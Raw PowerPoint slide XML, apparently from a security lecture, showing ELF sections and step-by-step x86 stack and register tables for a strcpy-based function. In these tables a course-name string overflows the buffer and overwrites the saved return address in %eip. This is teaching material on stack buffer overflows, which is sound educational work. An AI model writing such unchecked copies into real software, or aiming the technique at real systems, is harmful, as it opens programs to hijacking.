                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC</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4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.bss</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uninitialized data</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NOBITS</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ALLOC</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65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.init and .fini</a:t>
                      </a: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pre and post code</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>PROGBITS</a:t>
                      </a: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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and EXECINSTR</a:t>
                      </a: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398549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84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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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160</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2bc</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0x6c6c6166</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0x804840c</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18273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277190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1436646069"/>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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2bc</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0x6c6c6166</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0x804840d</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18273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30624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155183846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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</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 201 (0x31303220)</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fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)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162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2c0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0x6c6c6166</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0x31303220</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15111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30624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56013801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19237"/>
          <a:ext cx="2831284" cy="5181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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10014"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2d4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="155275" y="5403584"/>
          <a:ext cx="3684334" cy="1353312"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1836254">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eax</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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esp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0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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ebp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0x6c6c6166</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338328">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x31303220</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1"/>
            <a:ext cx="6225066" cy="653143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mycpy</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$0x28,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lea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strcpy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$0x10,</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$0x8048504,(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mycpy</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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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$0x8048517,</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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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$0x0,</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0x80483f4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483f5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483f7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048401</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048404</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048407</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840d</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0x804840e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048414</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
